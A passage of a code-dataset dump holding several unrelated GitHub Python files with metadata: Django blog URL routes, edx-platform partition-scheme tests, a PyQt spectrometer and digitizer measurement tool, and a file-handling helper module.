tools.run(*command)\n","repo_name":"nd-net/bootstrap","sub_path":"bootstrap_impl/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26570973290","text":"from django.urls import path\nfrom . import views\n\napp_name = 'blog'\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('/', views.detail_article, name='detail'),\n path('create/', views.create_view, name='create'),\n path('create/blog/', views.create_action, name='create_action'),\n path('/comment/', views.comment, name='comment'),\n path('register/', views.register, name='register')\n]\n","repo_name":"jingyu722/DjangoBlog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12615444213","text":"\"\"\"\nTest the user api's partition extensions.\n\"\"\"\n\n\nfrom collections import defaultdict\nfrom unittest.mock import patch\n\nimport pytest\nfrom django.test import TestCase\n\nfrom openedx.core.djangoapps.user_api.partition_schemes import RandomUserPartitionScheme, UserPartitionError\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom xmodule.partitions.partitions import Group, UserPartition # lint-amnesty, pylint: disable=wrong-import-order\nfrom xmodule.partitions.tests.test_partitions import PartitionTestCase # lint-amnesty, pylint: disable=wrong-import-order\n\n\nclass MemoryCourseTagAPI:\n \"\"\"\n An implementation of a user service that uses an in-memory dictionary for storage\n \"\"\"\n def __init__(self):\n self._tags = defaultdict(dict)\n\n def get_course_tag(self, __, course_id, key):\n \"\"\"Sets the value of ``key`` to ``value``\"\"\"\n return self._tags[course_id].get(key)\n\n def set_course_tag(self, __, course_id, key, value):\n \"\"\"Gets the value of ``key``\"\"\"\n self._tags[course_id][key] = value\n\n class BulkCourseTags:\n @classmethod\n def is_prefetched(self, course_id): # lint-amnesty, pylint: disable=bad-classmethod-argument, unused-argument\n return False\n\n\n@pytest.mark.django_db\nclass TestRandomUserPartitionScheme(PartitionTestCase):\n \"\"\"\n Test getting a user's group out of a partition\n \"\"\"\n\n MOCK_COURSE_ID = \"mock-course-id\"\n\n def setUp(self):\n super().setUp()\n # Patch in a memory-based user service instead of using the persistent version\n course_tag_api = MemoryCourseTagAPI()\n self.user_service_patcher = patch(\n 'openedx.core.djangoapps.user_api.partition_schemes.course_tag_api', course_tag_api\n )\n self.user_service_patcher.start()\n self.addCleanup(self.user_service_patcher.stop)\n\n # Create a test user\n self.user = UserFactory.create()\n\n def test_get_group_for_user(self):\n # get a group assigned to the user\n group1_id = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, self.user_partition)\n\n # make sure we get the same group back out every time\n for __ in range(10):\n group2_id = RandomUserPartitionScheme.get_group_for_user(\n self.MOCK_COURSE_ID,\n self.user,\n self.user_partition\n )\n assert group1_id == group2_id\n\n def test_get_group_for_user_with_assign(self):\n \"\"\"\n Make sure get_group_for_user returns None if no group is already\n assigned to a user instead of assigning/creating a group automatically\n \"\"\"\n # We should not get any group because assign is False which will\n # protect us from automatically creating a group for user\n group = RandomUserPartitionScheme.get_group_for_user(\n self.MOCK_COURSE_ID, self.user, self.user_partition, assign=False\n )\n\n assert group is None\n\n # We should get a group automatically assigned to user\n group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, self.user_partition)\n\n assert group is not None\n\n def test_empty_partition(self):\n empty_partition = UserPartition(\n self.TEST_ID,\n 'Test Partition',\n 'for testing purposes',\n [],\n scheme=RandomUserPartitionScheme\n )\n # get a group assigned to the user\n with self.assertRaisesRegex(UserPartitionError, \"Cannot assign user to an empty user partition\"):\n RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, empty_partition)\n\n def test_user_in_deleted_group(self):\n # get a group assigned to the user - should be group 0 or 1\n old_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, self.user_partition)\n assert old_group.id in [0, 1]\n\n # Change the group definitions! No more group 0 or 1\n groups = [Group(3, 'Group 3'), Group(4, 'Group 4')]\n user_partition = UserPartition(self.TEST_ID, 'Test Partition', 'for testing purposes', groups)\n\n # Now, get a new group using the same call - should be 3 or 4\n new_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, user_partition)\n assert new_group.id in [3, 4]\n\n # We should get the same group over multiple calls\n new_group_2 = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, user_partition)\n assert new_group == new_group_2\n\n def test_change_group_name(self):\n # Changing the name of the group shouldn't affect anything\n # get a group assigned to the user - should be group 0 or 1\n old_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, self.user_partition)\n assert old_group.id in [0, 1]\n\n # Change the group names\n groups = [Group(0, 'Group 0'), Group(1, 'Group 1')]\n user_partition = UserPartition(\n self.TEST_ID,\n 'Test Partition',\n 'for testing purposes',\n groups,\n scheme=RandomUserPartitionScheme\n )\n\n # Now, get a new group using the same call\n new_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, user_partition)\n assert old_group.id == new_group.id\n\n\nclass TestExtension(TestCase):\n \"\"\"\n Ensure that the scheme extension is correctly plugged in (via entry point\n in setup.py)\n \"\"\"\n\n def test_get_scheme(self):\n assert UserPartition.get_scheme('random') == RandomUserPartitionScheme\n with self.assertRaisesRegex(UserPartitionError, 'Unrecognized scheme'):\n UserPartition.get_scheme('other')\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/user_api/tests/test_partition_schemes.py","file_name":"test_partition_schemes.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"73436763602","text":"from instruments.OceanOptics.spectrometer import QSpectrometer\r\nfrom PyQt5.QtCore import QThread, QTimer, QObject, pyqtSignal, pyqtSlot\r\nfrom PyQt5 import QtWidgets\r\nimport instruments.CAEN as CAENlib\r\nfrom instruments.Thorlabs.shuttercontrollers import QShutterControl\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nimport sys\r\nimport numpy as np\r\nimport time\r\nfrom matplotlib import pyplot as plt\r\nimport random\r\nimport logging\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n\r\nclass Spectrometer(QSpectrometer):\r\n\r\n measurement_complete_result = pyqtSignal(np.ndarray)\r\n measurement_complete_signal = pyqtSignal()\r\n measurement_complete_dark_result = pyqtSignal(np.ndarray)\r\n measurement_complete_dark_signal = pyqtSignal()\r\n\r\n def __init__(self):\r\n super().__init__()\r\n\r\n @pyqtSlot()\r\n def measure_spectrum(self):\r\n spectrum, _ = self.measure()\r\n self.measurement_complete_result.emit(spectrum)\r\n self.measurement_complete_signal.emit()\r\n\r\n @pyqtSlot()\r\n def measure_dark_spectrum(self):\r\n darkspectrum, _ = self.measure_dark()\r\n self.measurement_complete_dark_result.emit(darkspectrum)\r\n self.measurement_complete_dark_signal.emit()\r\n logging.info('Took darkspectrum')\r\n\r\n @pyqtSlot(int)\r\n def set_integration_time(self, number_of_pulses):\r\n # frequency of laser is 101 Hz, integration time is in ms\r\n integration_time = 1000 / 101 * number_of_pulses\r\n self.integrationtime = integration_time\r\n\r\n\r\nclass Digitizer(CAENlib.Digitizer):\r\n # subclussing digitizer to add some additional signals\r\n measurement_complete_single_result = pyqtSignal(np.ndarray)\r\n measurement_complete_single_signal = pyqtSignal()\r\n measurement_complete_multiple_result = pyqtSignal(np.ndarray)\r\n measurement_complete_multiple_signal = pyqtSignal()\r\n\r\n def __init__(self, digitizer_handle=CAENlib.list_available_devices()[0]):\r\n CAENlib.Digitizer.__init__(self, digitizer_handle)\r\n self.number_of_pulses = 30\r\n\r\n @pyqtSlot()\r\n def measure_digi(self):\r\n # subtracts average of first 50 samples, inverts data\r\n data = self.measure()[list(self.active_channels)][0][0]\r\n data = -(data - np.mean(data[0:50]))\r\n return data\r\n\r\n @pyqtSlot()\r\n def measure_digi_emit(self):\r\n data = self.measure_digi()\r\n self.measurement_complete_single_result.emit(data)\r\n self.measurement_complete_single_signal.emit()\r\n return data\r\n\r\n @pyqtSlot()\r\n def measure_multiple_digi(self):\r\n data = []\r\n for i in range(self.number_of_pulses):\r\n if i == 0:\r\n data = self.measure_digi()\r\n else:\r\n data = np.vstack((data, self.measure_digi()))\r\n self.measurement_complete_multiple_result.emit(data)\r\n self.measurement_complete_multiple_signal.emit()\r\n return data\r\n\r\n\r\nclass MultipleSignal(QObject):\r\n\r\n measurements_done = pyqtSignal()\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.sp_done = False\r\n self.digi_done = False\r\n\r\n @pyqtSlot()\r\n def set_sp_done(self):\r\n self.sp_done = True\r\n self.check_measurements_done()\r\n\r\n @pyqtSlot()\r\n def set_digi_done(self):\r\n self.digi_done = True\r\n self.check_measurements_done()\r\n\r\n @pyqtSlot()\r\n def check_measurements_done(self):\r\n if self.sp_done and self.digi_done:\r\n self.measurements_done.emit()\r\n self.sp_done = False\r\n self.digi_done = False\r\n logging.info('both signals done, emitted global done')\r\n\r\n @pyqtSlot()\r\n def reset(self):\r\n self.sp_done = False\r\n self.digi_done = False\r\n\r\n\r\nclass PlotWindow(QtWidgets.QWidget):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.figure, self.ax = plt.subplots()\r\n self.canvas = FigureCanvas(self.figure)\r\n self.layout = QtWidgets.QVBoxLayout()\r\n self.layout.setContentsMargins(0, 0, 0, 0)\r\n self.layout.addWidget(self.canvas)\r\n\r\n @pyqtSlot(np.ndarray)\r\n def plot(self, ratio):\r\n self.ax.clear()\r\n self.ax.plot(ratio)\r\n self.ax.set_xlabel('Measurement number')\r\n self.ax.set_ylabel('Normalized ratio spectropower to laserpower')\r\n self.ax.set_title('Integrated spectrometer power relative to last measurement')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n @pyqtSlot(np.ndarray)\r\n def plot_spectrum(self, spectrum):\r\n self.ax.clear()\r\n self.ax.plot(spectrum)\r\n self.ax.set_xlabel('Wavelength')\r\n self.ax.set_ylabel('Counts')\r\n self.ax.set_title('Spectrometer spectrum')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n @pyqtSlot(np.ndarray)\r\n def plot_pulse(self, pulse):\r\n self.ax.clear()\r\n self.ax.plot(pulse)\r\n self.ax.set_xlabel('Sample nr')\r\n self.ax.set_ylabel('Counts')\r\n self.ax.set_title('Digitizer readout')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n @pyqtSlot()\r\n def clearplot(self):\r\n self.ax.clear()\r\n self.ax.set_xlabel('Measurement number')\r\n self.ax.set_ylabel('Normalized ratio spectropower to laserpower')\r\n self.ax.set_title('Power in spectrum versus laser power by integrating pulses')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n\r\nclass SpectroPower(QtWidgets.QWidget):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.running = False\r\n self.number_of_pulses = 30\r\n self.measurement_spectrometer_last = np.empty(0)\r\n self.measurement_spectrometer_sum = np.empty(0)\r\n self.measurement_spectrometer_dark_last = np.empty(0)\r\n self.measurement_spectrometer_dark_sum = np.empty(0)\r\n self.measurement_digitizer_last = np.empty(0)\r\n self.measurement_digitizer_sum = np.empty(0)\r\n\r\n # create workers\r\n self.sp = Spectrometer()\r\n self.digitizer = Digitizer()\r\n self.shuttercontrol = QShutterControl()\r\n self.signalchecker = MultipleSignal()\r\n self.plotwindow = PlotWindow()\r\n\r\n # setup ui\r\n self.startbutton = QtWidgets.QPushButton('start/restart')\r\n self.stopbutton = QtWidgets.QPushButton('stop')\r\n self.clearbutton = QtWidgets.QPushButton('clear')\r\n self.horizontallayout_buttons = QtWidgets.QHBoxLayout()\r\n self.horizontallayout_buttons.addWidget(self.startbutton)\r\n self.horizontallayout_buttons.addWidget(self.stopbutton)\r\n self.horizontallayout_buttons.addWidget(self.clearbutton)\r\n\r\n self.ratiobutton = QtWidgets.QPushButton('ratio')\r\n self.pulsebutton = QtWidgets.QPushButton('pulse')\r\n self.spectrometerbutton = QtWidgets.QPushButton('spectrometer')\r\n self.horizontallayout_buttons_experiment = QtWidgets.QHBoxLayout()\r\n self.horizontallayout_buttons_experiment.addWidget(self.ratiobutton)\r\n self.horizontallayout_buttons_experiment.addWidget(self.pulsebutton)\r\n self.horizontallayout_buttons_experiment.addWidget(self.spectrometerbutton)\r\n\r\n self.pulses_label = QtWidgets.QLabel('number of pulses')\r\n self.pulses = QtWidgets.QSpinBox()\r\n self.pulses.setMinimum(3)\r\n self.pulses.setMaximum(1000)\r\n self.pulses.setValue(self.number_of_pulses)\r\n self.pulses_indicator = QtWidgets.QLabel('set pulses')\r\n self.horizontallayout_pulses = QtWidgets.QHBoxLayout()\r\n self.horizontallayout_pulses.addWidget(self.pulses_label)\r\n self.horizontallayout_pulses.addWidget(self.pulses)\r\n self.horizontallayout_pulses.addWidget(self.pulses_indicator)\r\n\r\n self.gridlayout = QtWidgets.QGridLayout()\r\n self.gridlayout.addLayout(self.plotwindow.layout, 0, 0)\r\n self.gridlayout.addLayout(self.horizontallayout_pulses, 1, 0)\r\n self.gridlayout.addLayout(self.horizontallayout_buttons_experiment, 2, 0)\r\n self.gridlayout.addLayout(self.horizontallayout_buttons, 3, 0)\r\n self.setLayout(self.gridlayout)\r\n\r\n # create threads for workers and move workers to threads, then start threads\r\n self.sp_thread = QThread()\r\n self.digitizer_thread = QThread()\r\n self.shuttercontrol_thread = QThread()\r\n self.signalchecker_thread = QThread()\r\n self.plot_thread = QThread()\r\n self.sp.moveToThread(self.sp_thread)\r\n self.digitizer.moveToThread(self.digitizer_thread)\r\n self.shuttercontrol.moveToThread(self.shuttercontrol_thread)\r\n self.signalchecker.moveToThread(self.signalchecker_thread)\r\n self.plotwindow.moveToThread(self.plot_thread)\r\n\r\n # create timers for periodic signals\r\n self.timer_measurement = QTimer()\r\n self.timer_plot = QTimer()\r\n\r\n # connect signals\r\n self.startbutton.clicked.connect(self.start)\r\n self.stopbutton.clicked.connect(self.stop)\r\n self.clearbutton.clicked.connect(self.clear)\r\n self.ratiobutton.clicked.connect(self.measure_ratio)\r\n self.pulsebutton.clicked.connect(self.measure_pulse)\r\n self.spectrometerbutton.clicked.connect(self.measure_spectrum)\r\n\r\n self.timer_plot.timeout.connect(self.plot_ratio)\r\n\r\n self.sp.measurement_complete_result.connect(self.process_spectrometer)\r\n self.sp.measurement_complete_signal.connect(self.signalchecker.set_sp_done)\r\n self.sp.measurement_complete_dark_result.connect(self.process_spectrometer_dark)\r\n self.digitizer.measurement_complete_multiple_result.connect(self.process_digitizer_multiple)\r\n self.digitizer.measurement_complete_multiple_signal.connect(self.signalchecker.set_digi_done)\r\n self.digitizer.measurement_complete_single_result.connect(self.process_digitizer_single)\r\n\r\n self.stopbutton.setEnabled(False)\r\n self.startbutton.setEnabled(False)\r\n self.clearbutton.setEnabled(False)\r\n\r\n # initialize instruments\r\n self.init_sp()\r\n self.init_shuttercontrol()\r\n self.init_digitizer()\r\n\r\n # start instrument threads\r\n self.sp_thread.start()\r\n self.digitizer_thread.start()\r\n self.shuttercontrol_thread.start()\r\n self.plot_thread.start()\r\n self.signalchecker_thread.start()\r\n\r\n def init_sp(self):\r\n self.sp.connect()\r\n pass\r\n\r\n def init_shuttercontrol(self):\r\n self.shuttercontrol.connect()\r\n\r\n def init_digitizer(self):\r\n powermeter_channel = 1\r\n powermeter_dc_offset = 10\r\n self.digitizer.set_channel_gain(channel=powermeter_channel, value=1)\r\n self.digitizer.record_length = 0\r\n self.digitizer.max_num_events = 1\r\n self.digitizer.post_trigger_size = 90\r\n self.digitizer.acquisition_mode = CAENlib.AcqMode.SW_CONTROLLED\r\n channels = {powermeter_channel: powermeter_dc_offset}\r\n # Program the Digitizer\r\n self.digitizer.active_channels = channels.keys()\r\n for channel, dc_offset in channels.items():\r\n self.digitizer.set_dc_offset(channel, dc_offset)\r\n\r\n self.digitizer.external_trigger_mode = CAENlib.TriggerMode.ACQ_ONLY\r\n self.digitizer.external_trigger_level = CAENlib.IOLevel.TTL\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_digitizer_multiple(self, result):\r\n pulse_sum = np.sum(result)\r\n self.measurement_digitizer_sum = np.append(self.measurement_digitizer_sum, pulse_sum)\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_digitizer_single(self, result):\r\n self.measurement_digitizer_last = result\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_spectrometer(self, result):\r\n self.measurement_spectrometer_last = result\r\n spectrometer_sum = np.sum(result)\r\n self.measurement_spectrometer_sum = np.append(self.measurement_spectrometer_sum, spectrometer_sum)\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_spectrometer_dark(self, result):\r\n self.measurement_spectrometer_dark_last = result\r\n self.measurement_spectrometer_dark_sum = np.sum(result)\r\n\r\n @pyqtSlot()\r\n def pulses_changed(self):\r\n # closes the shutter, disconnects from doing new measurements and connects to wait for last measurement\r\n\r\n QTimer.singleShot(0, self.shuttercontrol.disable)\r\n\r\n try:\r\n self.pulses.editingFinished.disconnect()\r\n logging.info(f'disconnected edit pulses')\r\n except TypeError as e:\r\n logging.info(f'pulses {e}')\r\n\r\n self.pulses_indicator.setText(f'taking darkspectrum')\r\n self.number_of_pulses = self.pulses.value()\r\n self.toggle_all_buttons(False)\r\n if self.running:\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n self.signalchecker.measurements_done.connect(self.wait_for_last_measurement)\r\n logging.info(f'disconnected measurements done from new measurement')\r\n except TypeError as e:\r\n logging.info(f'signal: measurements done {e}')\r\n else:\r\n self.wait_for_last_measurement()\r\n\r\n @pyqtSlot()\r\n def wait_for_last_measurement(self):\r\n # takes new dark spectrum after last measurement has come in\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info(f'disconnected measurement done from await signal')\r\n except TypeError as e:\r\n logging.info(f'measurements done wait for last measurement{e}')\r\n\r\n self.clear()\r\n self.digitizer.number_of_pulses = self.number_of_pulses\r\n self.sp.set_integration_time(self.number_of_pulses)\r\n QTimer.singleShot(0, self.sp.measure_dark_spectrum)\r\n\r\n\r\n @pyqtSlot()\r\n def toggle_all_buttons(self, toggle):\r\n self.startbutton.setEnabled(toggle)\r\n self.stopbutton.setEnabled(toggle)\r\n self.clearbutton.setEnabled(toggle)\r\n self.ratiobutton.setEnabled(toggle)\r\n self.pulsebutton.setEnabled(toggle)\r\n self.spectrometerbutton.setEnabled(toggle)\r\n self.pulses.setEnabled(toggle)\r\n\r\n @pyqtSlot()\r\n def start(self):\r\n self.running = True\r\n # redo measurement at every integration time. Add in little extra time to make sure measurement is complete\r\n self.startbutton.setEnabled(False)\r\n self.stopbutton.setEnabled(True)\r\n self.signalchecker.measurements_done.connect(self.sp.measure_spectrum)\r\n self.signalchecker.reset()\r\n QTimer.singleShot(0, self.sp.measure_spectrum)\r\n self.timer_plot.start(500)\r\n\r\n @pyqtSlot()\r\n def stop(self):\r\n try:\r\n self.pulses.editingFinished.disconnect()\r\n logging.info(f'disconnected edit pulses from stop function')\r\n except TypeError as e:\r\n logging.info(f'pulses {e}')\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info(f'stopping, disconnected measurements done from new measurement')\r\n except TypeError as e:\r\n logging.info(f'signal: global done {e}')\r\n self.toggle_all_buttons(False)\r\n self.signalchecker.measurements_done.connect(self.reset_buttons)\r\n logging.info(f'connected measurement done to reset')\r\n\r\n @pyqtSlot()\r\n def reset_buttons(self):\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info(f'disconnected measurements done from reset buttons')\r\n except TypeError as e:\r\n logging.info(f'measurements done : {e}')\r\n self.toggle_all_buttons(True)\r\n self.stopbutton.setEnabled(False)\r\n self.ratiobutton.setEnabled(False)\r\n self.running = False\r\n self.pulses.editingFinished.connect(self.pulses_changed)\r\n\r\n @pyqtSlot()\r\n def clear(self):\r\n self.measurement_digitizer_sum = np.empty(0)\r\n self.measurement_spectrometer_sum = np.empty(0)\r\n try:\r\n self.signalchecker.measurements_done.disconnect(self.clear)\r\n except TypeError as e:\r\n logging.info(e)\r\n\r\n @pyqtSlot()\r\n def plot_ratio(self):\r\n cleaned_spectrum = self.measurement_spectrometer_sum - self.measurement_spectrometer_dark_sum\r\n minlength = min(len(cleaned_spectrum), len(self.measurement_digitizer_sum))\r\n if minlength > 0:\r\n ratio = cleaned_spectrum[:minlength]/self.measurement_digitizer_sum[:minlength]\r\n ratio_normalized = ratio/ratio[-1]\r\n cleaned_spectrum_ratio = cleaned_spectrum/cleaned_spectrum[-1]\r\n QTimer.singleShot(0, lambda x=cleaned_spectrum_ratio: self.plotwindow.plot(x))\r\n\r\n @pyqtSlot()\r\n def disconnect_signals(self):\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info('succesfully disconnected measurements done')\r\n except TypeError as e:\r\n logging.info(f'signal : measurements done - {e}')\r\n try:\r\n self.pulses.editingFinished.disconnect()\r\n logging.info('succesfully disconnected editingFinished')\r\n except TypeError as e:\r\n logging.info(f'signal : pulses editingfinished - {e}')\r\n try:\r\n self.timer_plot.stop()\r\n self.timer_plot.disconnect()\r\n logging.info('succesfully disconnected timer plot')\r\n except TypeError as e:\r\n logging.info(f'signal : timer plot - {e}')\r\n try:\r\n self.timer_measurement.stop()\r\n self.timer_measurement.disconnect()\r\n logging.info('succesfully disconnected timer measurement')\r\n except TypeError as e:\r\n logging.info(f'signal : timer measurement - {e}')\r\n try:\r\n self.sp.cache_cleared.disconnect()\r\n logging.info('succesfully disconnected cache cleared')\r\n except TypeError as e:\r\n logging.info(f'signal : cache cleared - {e}')\r\n try:\r\n self.sp.measurement_complete_dark_signal.disconnect()\r\n logging.info('succesfully disconnected measurement_dark')\r\n except TypeError as e:\r\n logging.info(f'signal : cache cleared - {e}')\r\n\r\n @pyqtSlot()\r\n def measure_ratio(self):\r\n self.disconnect_signals()\r\n self.clear()\r\n self.pulses_changed()\r\n self.sp.cache_cleared.connect(self.digitizer.measure_multiple_digi)\r\n self.pulses.editingFinished.connect(self.pulses_changed)\r\n self.sp.measurement_complete_dark_signal.connect(self.darkspectrum_taken)\r\n self.toggle_all_buttons(True)\r\n self.stopbutton.setEnabled(False)\r\n self.ratiobutton.setEnabled(False)\r\n\r\n self.timer_plot.timeout.connect(self.plot_ratio)\r\n self.timer_plot.start(500)\r\n\r\n def darkspectrum_taken(self):\r\n # opens shutter, sets the pulse indicator to current number of pulses.\r\n # Reconnects edit finished to pulses changed\r\n\r\n QTimer.singleShot(0, self.shuttercontrol.enable)\r\n pulses = self.number_of_pulses\r\n QTimer.singleShot(0, lambda x=pulses: self.pulses_indicator.setText(f'{x} pulses'))\r\n self.toggle_all_buttons(True)\r\n self.ratiobutton.setEnabled(False)\r\n self.stopbutton.setEnabled(False)\r\n self.pulses.setEnabled(True)\r\n self.pulses.lineEdit()\r\n self.pulses.editingFinished.connect(self.pulses_changed)\r\n\r\n @pyqtSlot()\r\n def measure_pulse(self):\r\n # todo include shutter signal to be open\r\n self.disconnect_signals()\r\n self.toggle_all_buttons(False)\r\n self.spectrometerbutton.setEnabled(True)\r\n self.ratiobutton.setEnabled(True)\r\n\r\n self.timer_measurement.timeout.connect(self.digitizer.measure_digi_emit)\r\n self.timer_plot.timeout.connect(self.plot_pulse)\r\n self.timer_measurement.start(100)\r\n self.timer_plot.start(100)\r\n\r\n @pyqtSlot()\r\n def plot_pulse(self):\r\n if any(self.measurement_digitizer_last):\r\n QTimer.singleShot(0, lambda x=self.measurement_digitizer_last: self.plotwindow.plot_pulse(x))\r\n else:\r\n QTimer.singleShot(0, self.plotwindow.clearplot)\r\n\r\n @pyqtSlot()\r\n def measure_spectrum(self):\r\n self.disconnect_signals()\r\n self.toggle_all_buttons(False)\r\n self.ratiobutton.setEnabled(True)\r\n self.pulsebutton.setEnabled(True)\r\n self.pulses.setEnabled(True)\r\n\r\n self.pulses.editingFinished.connect(self.set_pulses_spectrum)\r\n self.timer_measurement.timeout.connect(self.measure_sp)\r\n self.timer_plot.timeout.connect(self.plot_spectrum)\r\n self.timer_measurement.start(200)\r\n self.timer_plot.start(200)\r\n\r\n @pyqtSlot()\r\n def measure_sp(self):\r\n if not self.sp.measuring:\r\n QTimer.singleShot(0, self.sp.measure_spectrum)\r\n\r\n @pyqtSlot()\r\n def set_pulses_spectrum(self): \r\n self.number_of_pulses = self.pulses.value()\r\n self.pulses_indicator.setText(f'{self.number_of_pulses} pulses')\r\n QTimer.singleShot(0, lambda x=self.number_of_pulses: self.sp.set_integration_time(x))\r\n\r\n @pyqtSlot()\r\n def plot_spectrum(self):\r\n if any(self.measurement_spectrometer_last):\r\n QTimer.singleShot(0, lambda x=self.measurement_spectrometer_last: self.plotwindow.plot_spectrum(x))\r\n else:\r\n QTimer.singleShot(0, self.plotwindow.clearplot)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n main = SpectroPower()\r\n main.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"baukekooger/XY_Measurement","sub_path":"tests/oldstuff/test_power_spectrometer_relation.py","file_name":"test_power_spectrometer_relation.py","file_ext":"py","file_size_in_byte":21613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7760505312","text":"import os\nimport time\nfrom datetime import datetime\nfrom shutil import copyfile\n\nfrom pathlib import Path\n\nfrom outmail import send_mail\n\n\ndef get_datetime(rev: bool = False):\n if rev:\n date_time = str(datetime.now().strftime(\"%Y.%m.%d_%H.%M\"))\n else:\n date_time = str(datetime.now().strftime(\"%d.%m.%Y_%H.%M\"))\n return date_time\n\n\nclass ListDir:\n def __init__(self, target_path):\n \"\"\"\n\n :param target_path: Path for detect difference\n \"\"\"\n self.target_path = Path(target_path)\n self.reference_filelist = self.get_listdir()\n\n def get_listdir(self):\n return set(os.listdir(self.target_path))\n\n def get_diff(self):\n return self.get_listdir() - self.reference_filelist\n\n\ndef clear_testpath(testpath):\n if 'test' in str(testpath):\n if len(os.listdir(testpath)) > 0:\n for file in os.listdir(testpath):\n os.remove(testpath / Path(file))\n os.rmdir(testpath)\n if not Path(testpath).is_dir():\n print(f'testdir {testpath} removed')\n\n\ndef wait_downloaded_file(driver, pathtosave):\n my_list = ListDir(pathtosave)\n downloaded_file_name = set()\n counter = 15\n downloaded_file_full_path = None\n while not downloaded_file_name and counter:\n time.sleep(1)\n downloaded_file_name = my_list.get_diff()\n if len(downloaded_file_name) == 1 \\\n and 'issues' in str(downloaded_file_name) \\\n and '.csv' in str(downloaded_file_name) \\\n and 'down' not in str(downloaded_file_name):\n driver.close()\n driver.quit()\n downloaded_file_full_path = Path(pathtosave) / Path(list(downloaded_file_name)[0])\n else:\n downloaded_file_name = set()\n counter -= 1\n print(f'осталось {counter} секунд')\n if downloaded_file_full_path \\\n and downloaded_file_full_path.exists():\n print(f'сохранен {downloaded_file_full_path}')\n clear_testpath(pathtosave)\n else:\n print('Downloaded file not exist. ERROR')\n return downloaded_file_full_path\n\n\ndef wait_new_file(func):\n def wrapper(pathtosave):\n my_list = ListDir(pathtosave)\n print('start')\n func(pathtosave)\n print('finish')\n return my_list.get_diff()\n\n return wrapper\n\n\ndef send_error_to_me(error_message):\n send_mail(e_addr='phaggi@gmail.com', subject='Problem!',\n body_text=error_message)\n\n\ndef mailme_error(error_message):\n send_error_to_me(error_message=error_message)\n raise Exception(error_message)\n\n\ndef find_file(filenames: set, pathtosave, word):\n for filename in filenames:\n if word in filename:\n return pathtosave / Path(filename)\n else:\n mailme_error(f'В папке {pathtosave} новых файлов не найдено. А должны быть!')\n\n\ndef prepare_vba_school_input_csv(downloaded_file_full_path, vba_input_file_name, vba_work_dir):\n src = downloaded_file_full_path\n dst = Path.cwd() / Path(vba_work_dir) / Path(vba_input_file_name)\n try:\n copyfile(src, dst)\n return dst\n except FileNotFoundError as e:\n mailme_error(f'Не удалось подготовить входной файл для VBA обработки.\\nОшибка {e}')\n\n\ndef prepare_filename(result_filename=None, ext=None):\n \"\"\"\n\n :param result_filename: str text for filename\n :param ext: str suffix '.xxx' or 'xxx'\n :return: (Path(filename.ext|, filename, ext)\n \"\"\"\n if not result_filename:\n result_filename = 'выгрузка'\n if not ext:\n ext = 'xlsx'\n elif ext.startswith('.'):\n ext = ext[1:]\n result_filename = '_'.join([result_filename, get_datetime()])\n return Path('.'.join([result_filename, ext])), result_filename, ext\n\n\ndef move_result(result_filename=None, ext=None, src=None, dst=None):\n \"\"\"\n\n :param result_filename: str text for filename\n :param ext: str suffix '.xxx' or 'xxx'\n :param src: maybe Path(/dir/file) or default vba/result.xlsx\n :param dst: maybe Path(/dir/file) or default ~/redmine/(result_filename)\n :return: (dst, result_filename)\n \"\"\"\n result_full_filename = prepare_filename(result_filename=result_filename, ext=ext)[0]\n if not src:\n src = Path.cwd() / Path('vba') / Path('result.xlsx')\n if not dst:\n dst = Path.home() / Path('redmine') / result_full_filename\n copyfile(src, dst)\n os.remove(src)\n return dst, result_full_filename\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"phaggi/outlook_mail_sender","sub_path":"fileman.py","file_name":"fileman.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18931265779","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[36]:\n\n\n# import necessary libraries - Monir\nimport pandas as pd\nimport os\nimport glob\nimport numpy as np\nfrom csv import 